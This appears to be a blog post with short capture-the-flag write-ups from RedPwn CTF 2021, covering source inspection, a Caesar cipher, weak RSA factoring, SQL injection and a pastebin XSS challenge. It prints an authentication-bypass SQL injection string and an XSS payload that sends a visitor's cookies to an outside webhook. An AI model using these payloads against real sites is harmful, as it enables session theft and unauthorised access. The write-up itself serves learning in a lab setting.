RedPwn CTF 2021

Managed to find some time to grab the low hanging fruit on this CTF:

web/inspect-me

Exactly what it says on the tin. Inspect the source code, the flag is commented.

flag{inspect_me_like_123}

misc/compliance-lattice-feline

Another free flag – you simply need to connect to the challenge

nc mc.ax 31443

flag{n3tc4t_1s_a_pip3_t0_the_w0rld}

crypto/scissor

I was given this string and told something about scissors

egddagzp_ftue_rxms_iuft_rxms_radymf

“scissor” sounds like caesar – so it’s likely to be a Caesar cipher.

Using the boxentriq code breaking tools we get:

surround_this_flag_with_flag_format

so flag is:

flag{surround_this_flag_with_flag_format}

web/orm-bad

Challenge presented a basic username/password web application

Simple SQLi –

username: admin
password: ' or 1=1;

flag{sqli_overused_again_0b4f6}

The following two challenges were my “learners” where I discovered new tools and solved (albeit basic) challenges I had struggled with before.

crypto/baby

Given the following data and a hint that it relates to weak RSA implementation:

n: 228430203128652625114739053365339856393

e: 65537

c: 126721104148692049427127809839057445790

I learned that n is a function of factors p and q; once you know p,q, automated solving can be simple.

Check to see if the factors of n are “known” on FactorDB

They are – p = 12546190522253739887 q = 18207136478875858439

We can now try using RSACtfTool to solve:

./RsaCtfTool.py --uncipher 126721104148692049427127809839057445790 -p 12546190522253739887 -q 18207136478875858439 -e 65537

flag{68ab82df34}

web/pastebin-1

We are presented with two web applications:

The first, a basic pastebin which accepts input and then redirects to the newly generated paste

The second an “AdminBot” which suggests Admin will visit the URL that is provided as input.

So this appeared to be a XSS challenge to create a paste that will cause AdminBot to spill secret data.

Testing that theory, the first paste is:

<script>alert(1)</script>

Sure enough, when we submit the paste and redirect, we get an alert so the page is vulnerable to XSS.

We then need to set up a webhook – I use this site.

We then try to steal cookies using XSS by pasting following:

<script>window.open('https://webhook.site/******/'.concat(document.cookie))</script>

This generates a URL for our paste which we feed to AdminBot – we get the flag as a GET request on our webhook:

	https://webhook.site/******/flag=flag%7Bd1dn7_n33d_70_b3_1n_ru57%7D

Decoding from HTML Charset:

flag{d1dn7_n33d_70_b3_1n_ru57}

mrn00b0t

Interfacing between technophile and technophobe

RedPwn CTF 2021

Leave a Reply Cancel reply

Share this:

Like this:

Related

Leave a Reply Cancel reply